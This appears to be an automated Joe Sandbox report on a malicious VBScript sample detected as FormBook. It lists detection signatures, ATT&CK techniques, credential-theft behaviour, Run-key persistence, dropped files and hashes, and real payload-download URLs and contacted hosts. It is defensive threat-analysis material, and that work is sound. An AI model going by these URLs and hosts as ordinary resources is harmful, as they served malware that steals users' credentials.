      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORY
      Tries to steal Mail credentials (via file / registry access)Show sources
      Source: C:\Windows\SysWOW64\cmstp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
      Tries to harvest and steal browser information (history, passwords, etc)Show sources
      Source: C:\Windows\SysWOW64\cmstp.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login DataJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior

      Remote Access Functionality:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsScripting421Registry Run Keys / Startup Folder1Process Injection412Deobfuscate/Decode Files or Information11OS Credential Dumping1File and Directory Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsShared Modules1Boot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder1Scripting421LSASS MemorySystem Information Discovery114Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsCommand and Scripting Interpreter11Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information3Security Account ManagerQuery Registry1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsPowerShell2Logon Script (Mac)Logon Script (Mac)Masquerading1NTDSSecurity Software Discovery431Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol113SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion241LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonProcess Injection412Cached Domain CredentialsVirtualization/Sandbox Evasion241VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 552589 Sample: MTIR22024323_0553381487_202... Startdate: 13/01/2022 Architecture: WINDOWS Score: 100 62 www.jewelrystore1.com 2->62 76 Found malware configuration 2->76 78 Malicious sample detected (through community Yara rule) 2->78 80 Multi AV Scanner detection for submitted file 2->80 82 8 other signatures 2->82 12 wscript.exe 2 2->12         started        signatures3 process4 signatures5 92 VBScript performs obfuscated calls to suspicious functions 12->92 94 Wscript starts Powershell (via cmd or directly) 12->94 96 Very long command line found 12->96 98 Encrypted powershell cmdline option found 12->98 15 powershell.exe 25 12->15         started        process6 signatures7 102 Tries to detect Any.run 15->102 104 Hides threads from debuggers 15->104 18 ieinstal.exe 6 15->18         started        22 csc.exe 3 15->22         started        25 conhost.exe 15->25         started        27 2 other processes 15->27 process8 dnsIp9 64 www.wizumiya.co.jp 52.68.15.223, 443, 49775 AMAZON-02US United States 18->64 84 Modifies the context of a thread in another process (thread injection) 18->84 86 Tries to detect Any.run 18->86 88 Maps a DLL or memory area into another process 18->88 90 3 other signatures 18->90 29 explorer.exe 3 18->29 injected 58 C:\Users\user\AppData\Local\...\ej2xf2fu.dll, PE32 22->58 dropped 31 cvtres.exe 1 22->31         started        file10 signatures11 process12 process13 33 cmstp.exe 1 18 29->33         started        37 ieinstal.exe 29->37         started        39 autochk.exe 29->39         started        41 ieinstal.exe 29->41         started        file14 54 C:\Users\user\AppData\...\O11logrv.ini, data 33->54 dropped 56 C:\Users\user\AppData\...\O11logri.ini, data 33->56 dropped 68 Detected FormBook malware 33->68 70 Tries to steal Mail credentials (via file / registry access) 33->70 72 Tries to harvest and steal browser information (history, passwords, etc) 33->72 74 3 other signatures 33->74 43 cmd.exe 2 33->43         started        47 explorer.exe 33->47         started        50 explorer.exe 33->50         started        signatures15 process16 dnsIp17 60 C:\Users\user\AppData\Local\Temp\DB1, SQLite 43->60 dropped 100 Tries to harvest and steal browser information (history, passwords, etc) 43->100 52 conhost.exe 43->52         started        66 192.168.2.1 unknown unknown 47->66 file18 signatures19 process20

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      MTIR22024323_0553381487_20220112120005.vbs12%ReversingLabsScript-WScript.Downloader.SLoad

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      18.2.ieinstal.exe.30f0000.0.unpack100%AviraHEUR/AGEN.1211214Download File
      18.3.ieinstal.exe.3071dc0.0.unpack100%AviraHEUR/AGEN.1211214Download File
      27.2.cmstp.exe.eb0000.0.unpack100%AviraHEUR/AGEN.1211214Download File
      27.0.cmstp.exe.eb0000.0.unpack100%AviraHEUR/AGEN.1211214Download File

      Domains

      SourceDetectionScannerLabelLink
      www.wizumiya.co.jp0%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
      https://www.wizumiya.co.jp/html/user_data/original/images/bin_WUOAiR166.binhttp://fahrschule-heli.at0%Avira URL Cloudsafe
      www.jewelrystore1.com/wk3t/0%Avira URL Cloudsafe
      http://crl.microsoft0%URL Reputationsafe
      https://contoso.com/0%URL Reputationsafe
      https://contoso.com/License0%URL Reputationsafe
      https://contoso.com/Icon0%URL Reputationsafe
      http://schemas.microsoft.0%URL Reputationsafe
      http://fahrschule-heli.at/bin_WUOAiR166.bin0%Avira URL Cloudsafe
      https://www.wizumiya.co.jp/html/user_data/original/images/bin_WUOAiR166.bin0%Avira URL Cloudsafe
      https://www.wizumiya.co.jp/html/user_da0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      www.jewelrystore1.com
      		154.208.173.143
      		truetrue
        		unknown
        www.wizumiya.co.jp
        		52.68.15.223
        		truetrueunknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        www.jewelrystore1.com/wk3t/true
        • Avira URL Cloud: safe
        		low
        https://www.wizumiya.co.jp/html/user_data/original/images/bin_WUOAiR166.binfalse
        • Avira URL Cloud: safe
        		unknown
        https://www.wizumiya.co.jp/html/user_datrue
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000016.00000000.550056536.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.525388426.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.574580825.000000000095C000.00000004.00000020.sdmpfalse
          		high
          http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmpfalse
            		high
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.554251303.0000000004776000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://www.wizumiya.co.jp/html/user_data/original/images/bin_WUOAiR166.binhttp://fahrschule-heli.atieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://crl.microsoftpowershell.exe, 00000004.00000002.562105114.00000000074DC000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.554251303.0000000004776000.00000004.00000001.sdmpfalse
              		high
              https://contoso.com/powershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmpfalse
                		high
                https://contoso.com/Licensepowershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/Iconpowershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://schemas.microsoft.explorer.exe, 00000022.00000003.708741474.0000000004BF0000.00000004.00000001.sdmp, explorer.exe, 00000022.00000003.711582257.0000000004BF0000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://fahrschule-heli.at/bin_WUOAiR166.binieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gcmstp.exe, 0000001B.00000002.879127665.00000000003F8000.00000004.00000001.sdmpfalse
                  		high
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.553266966.0000000004631000.00000004.00000001.sdmpfalse
                    		high
                    https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.554251303.0000000004776000.00000004.00000001.sdmpfalse
                      		high

                      Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public

                      IPDomainCountryFlagASNASN NameMalicious
                      52.68.15.223
                      		www.wizumiya.co.jpUnited States
                      		16509AMAZON-02UStrue

                      Private

                      IP
                      192.168.2.1

                      General Information

                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:552589
                      Start date:13.01.2022
                      Start time:14:52:48
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 15m 18s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:MTIR22024323_0553381487_20220112120005.vbs
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:44
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:1
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winVBS@25/17@2/2
                      EGA Information:
                      • Successful, ratio: 100%
                      HDC Information:
                      • Successful, ratio: 62.3% (good quality ratio 54.3%)
                      • Quality average: 71.8%
                      • Quality standard deviation: 33.4%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 69
                      • Number of non-executed functions: 152
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Found application associated with file extension: .vbs
                      • Override analysis time to 240s for JS/VBS files not yet terminated
                      Warnings:
                      Show All
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SearchUI.exe, backgroundTaskHost.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, ShellExperienceHost.exe, WMIADAP.exe, conhost.exe, svchost.exe, mobsync.exe, wuapihost.exe
                      • Excluded IPs from analysis (whitelisted): 23.211.6.115
                      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, www.bing.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, img-prod-cms-rt-microsoft-com.akamaized.net, cdn.onenote.net, arc.msn.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtCreateFile calls found.
                      • Report size getting too big, too many NtEnumerateKey calls found.
                      • Report size getting too big, too many NtEnumerateValueKey calls found.
                      • Report size getting too big, too many NtOpenFile calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      14:54:20API Interceptor25x Sleep call for process: powershell.exe modified
                      14:55:50AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run KLQL6TZPVV C:\Program Files (x86)\internet explorer\ieinstal.exe
                      14:55:58AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run KLQL6TZPVV C:\Program Files (x86)\internet explorer\ieinstal.exe
                      14:56:17API Interceptor522x Sleep call for process: explorer.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      52.68.15.223New Order Requirment.vbsGet hashmaliciousBrowse
                      • wizumiya.co.jp/html/user_data/original/ann/biggyy1.jpg
                      SHIPPING DOCUMENTS.vbsGet hashmaliciousBrowse
                      • wizumiya.co.jp/html/user_data/original/ann/oiks.txt

                      Domains

                      No context

                      ASN

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      AMAZON-02USFourloko.armGet hashmaliciousBrowse
                      • 34.249.145.219
                      Fourloko.x86Get hashmaliciousBrowse
                      • 54.245.17.31
                      Order AR0179.xlsxGet hashmaliciousBrowse
                      • 34.217.125.80
                      wYYsswUH1B.xllGet hashmaliciousBrowse
                      • 13.225.75.74
                      6Wp2z2zlpXGet hashmaliciousBrowse
                      • 34.249.145.219
                      wyRy44m7psGet hashmaliciousBrowse
                      • 54.171.230.55
                      eoC9Q4T5rqGet hashmaliciousBrowse
                      • 34.217.158.217
                      yaf2oaQ51KGet hashmaliciousBrowse
                      • 18.237.164.155
                      Cu2npPG5OrGet hashmaliciousBrowse
                      • 34.249.145.219
                      lMnIONuVgcGet hashmaliciousBrowse
                      • 34.249.145.219
                      0fxLXeIFzdGet hashmaliciousBrowse
                      • 54.171.230.55
                      rCnHqUi2bBGet hashmaliciousBrowse
                      • 184.76.52.192
                      BavVPLNXUZGet hashmaliciousBrowse
                      • 184.72.41.209
                      Swt9tK1eDoGet hashmaliciousBrowse
                      • 184.77.138.15
                      L41WWtuFPRGet hashmaliciousBrowse
                      • 54.171.230.55
                      NLjOWVdxzEGet hashmaliciousBrowse
                      • 34.249.145.219
                      gpI655W2e7Get hashmaliciousBrowse
                      • 184.169.138.18
                      I9gFWKm2EmGet hashmaliciousBrowse
                      • 18.187.136.224
                      N9fUU4K448Get hashmaliciousBrowse
                      • 44.232.81.179
                      lQZORE67N3Get hashmaliciousBrowse
                      • 34.249.145.219

                      JA3 Fingerprints

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      37f463bf4616ecd445d4a1937da06e19RFQ_6400056554899993763.exeGet hashmaliciousBrowse
                      • 52.68.15.223
                      RFQ_6400056554899993763.exeGet hashmaliciousBrowse
                      • 52.68.15.223
                      Oyh92QysQI.exeGet hashmaliciousBrowse
                      • 52.68.15.223
                      S5MGgUIOGb.dllGet hashmaliciousBrowse
                      • 52.68.15.223
                      PhishingAttachment.xlsmGet hashmaliciousBrowse
                      • 52.68.15.223
                      YPOAp14Hoy.exeGet hashmaliciousBrowse
                      • 52.68.15.223
                      EvUgfbHwJj.exeGet hashmaliciousBrowse
                      • 52.68.15.223
                      05cbw9fnOV.exeGet hashmaliciousBrowse
                      • 52.68.15.223
                      a.dllGet hashmaliciousBrowse
                      • 52.68.15.223
                      'Vm Note'webmaster On Wed, 12 Jan 2022 230619 +0100.htmlGet hashmaliciousBrowse
                      • 52.68.15.223
                      anonymized.htmlGet hashmaliciousBrowse
                      • 52.68.15.223
                      'Vm Note'Samuel.Prescott On Wed, 12 Jan 2022 212311 +0100.htmlGet hashmaliciousBrowse
                      • 52.68.15.223
                      Updated Open Invoices and Statements.docxGet hashmaliciousBrowse
                      • 52.68.15.223
                      brwncald.com-e-FAX-50145-pdf.htmGet hashmaliciousBrowse
                      • 52.68.15.223
                      T8778900.htmGet hashmaliciousBrowse
                      • 52.68.15.223
                      documento103.vbeGet hashmaliciousBrowse
                      • 52.68.15.223
                      Encorebostonharbor#Ud83d#UdcdeAudio-File.htmGet hashmaliciousBrowse
                      • 52.68.15.223
                      MT-802-FAX-INV-7149201.htmGet hashmaliciousBrowse
                      • 52.68.15.223
                      Tuesday, January 11, 2022-ATT8778900.htmGet hashmaliciousBrowse
                      • 52.68.15.223
                      #Ud83d#Udce9 - mark.robins - Details.pdf.htmGet hashmaliciousBrowse
                      • 52.68.15.223

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
                      Process:C:\Windows\explorer.exe
                      File Type:data
                      Category:modified
                      Size (bytes):29232
                      Entropy (8bit):1.719605478566135
                      Encrypted:false
                      SSDEEP:96:9OXt/xlovXPg9GGbEu4M9e7jePNx/HiGEYcgf:dvXc940T/V
                      MD5:A50EED197FE2E44F38A1FBC67159EFAC
                      SHA1:5D176B29AB791D36E0A13F3AFF16C802C4AA135E
                      SHA-256:38E2E02DD39AD867C59D825214E161A205A05077BC9BC717996E056F7812FB21
                      SHA-512:617618FF90A63685E993399A9C825B3A8C6FF1361C7506E725654E12F0C8A712D3BF12F169A0E3E7CD705225BCC210AA87A79189A68AB6033E80DE1FB67F11B7
                      Malicious:false
                      Preview: ..0 IMMM ...............................................................................z...........4...............................................................................................................................................................................................QR.....................................................................D... ............T..................................................z.....Q. ...............................................................R..T.g.5 ...............................................................:..e.;6. ............j...................................................x..*...........................................................................................................................................................................................................................................................................................'.q..e.j........................................................
                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):5829
                      Entropy (8bit):4.8968676994158
                      Encrypted:false
                      SSDEEP:96:WCJ2Woe5o2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXx9smyFRLcU6f:5xoe5oVsm5emd0gkjDt4iWN3yBGHh9s6
                      MD5:36DE9155D6C265A1DE62A448F3B5B66E
                      SHA1:02D21946CBDD01860A0DE38D7EEC6CDE3A964FC3
                      SHA-256:8BA38D55AA8F1E4F959E7223FDF653ABB9BE5B8B5DE9D116604E1ABB371C1C87
                      SHA-512:C734ADE161FB89472B1DF9B9F062F4A53E7010D3FF99EDC0BD564540A56BC35743625C50A00635C31D165A74DCDBB330FFB878C5919D7B267F6F33D2AAB328E7
                      Malicious:false
                      Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                      C:\Users\user\AppData\Local\Temp\DB1
                      Process:C:\Windows\SysWOW64\cmd.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3032001
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.792852251086831
                      Encrypted:false
                      SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                      MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                      SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                      SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                      SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                      Malicious:true
                      Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Temp\FORSVARL.dat
                      Process:C:\Windows\System32\wscript.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):26711
                      Entropy (8bit):7.447343601702701
                      Encrypted:false
                      SSDEEP:768:ZVjtYl2Qumoov2LjPYPdU7MQIZInt28DNE8J:ZopugAjPYDWnTNv
                      MD5:501A97CEE8681B8E28324A9DCEFCCC69
                      SHA1:3B0EDC42D0E5C1E84E62C0018181BF01E9D5F433
                      SHA-256:B771C32B0F189855207BE56933EBCFB8142D18A20AA0F143B3E0DC3B545B6219
                      SHA-512:477322B3F7DEC25CD7EFAF2D252D899D3DA5437F0C74C389197B3AD23D7EFA0126D239CBC69B3C9F0E5CFD6084C7413FFA9D04C12499BFAB2D9F8CDFA915FB4A
                      Malicious:false
                      Preview: ......h.....4$!.N...$....Z.._1..4.8.l<....9.u.W........cl<82.....e..ft...x`@.J[....C n..$'..X...>Y.}..K.....@...,Z.d....%.1x0.._z7i..........cC..P.[!.U...~.oV.....H..F...Qy....O+....z.2.....4..........:Y..sqF.~...y);...{....I.A....02.WI..,..=..c.......v.!7._......@f."*s....ZjF.........-.Y0....D.h.M.........P....J:...&.....M.9..P.p9.l<8.l.8.l<..(.M.g].l.}.......L..<..U.Mo.u|.l...n<8-Y.T....7r..U...u.....j.. :.l...l<...<8...l<..Ni..Jw8....l<.G/<8.L....8..%;..X.o.....HR._....l<..p.u..IY....l<..D.u..9T.....l<...<8..6\.ld.".=8...n...9.lV9h..8.l.M.l<..H4...{..H4..,...H44.....H4..2.P..7..X...|...H5&.>.<.P....l<...1'...........,..UD..j.".=8...@.....m<8,\........d3.........k..K9.lTJ...P.....X.......H`.S..<....|.....T.....H.^.......^...X.$q.r.Bq.T.l<....M..R............^..m...>8...gi...n<8(.U{..._s...`D..3..,..o..2:.lT<.g.*.=8...../...".......#...-._...l<..<<8....d7<8.|r8...z.lTu..y..H.(.`...\jZ.....V.~.Hr8.5.u..:.).9.Z~~.......Z[..1jOn.$.l<...<8..J|.l.u...Q%.<.
                      C:\Users\user\AppData\Local\Temp\RES5835.tmp
                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols
                      Category:dropped
                      Size (bytes):1340
                      Entropy (8bit):3.9947234529934015
                      Encrypted:false
                      SSDEEP:24:HdK9oVaMYaHchKcjmfwI+ycuZhNW1NakSJ1CPNnq9ed:5IM9OK2mo1ulW1Na3J1Oq9+
                      MD5:D930D0FD1F5C0BA0AF7DF9E9D2E692D2
                      SHA1:0D922D7B63D83ED4F3C5B3BF9A95DD331BAEFF3A
                      SHA-256:B4ADC94FA9A02D91B0CB4F9D086BF0B0C6C88557A04996A3E0B0A53BBEFA3D05
                      SHA-512:E49951AC949875075F96CA48C220EC1F9FFEEC9C2F5281433D53877674BD54348AF2AB6D75432252F6E5D28C7CBA1213B220CA9104139D0C191B9AE661F95264
                      Malicious:false
                      Preview: L......a.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........W....c:\Users\user\AppData\Local\Temp\ej2xf2fu\CSC2BA07324D1EB47AD834E18C884AF81E4.TMP................8........l1rr.H..........7.......C:\Users\user\AppData\Local\Temp\RES5835.tmp.-.<...................'...Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...e.j.2.x.f.2.f.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....
                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ti3icgl.ztk.psm1
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview: 1
                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v10kgrqs.2gg.ps1
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview: 1
                      C:\Users\user\AppData\Local\Temp\ej2xf2fu\CSC2BA07324D1EB47AD834E18C884AF81E4.TMP
                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                      File Type:MSVC .res
                      Category:dropped
                      Size (bytes):652
                      Entropy (8bit):3.1130536385099568
                      Encrypted:false
                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry41Nak7YnqqJ1CPN5Dlq5J:+RI+ycuZhNW1NakSJ1CPNnqX
                      MD5:388794C6D483BB86F0D26C317272E848
                      SHA1:AAD2D00EAF92CF0FC921B271F3A3569B800AECA5
                      SHA-256:92DA20002E63D0CC8EBE6533AB4E5CBB7BC5DEAE37F857CF8526D18FB3966972
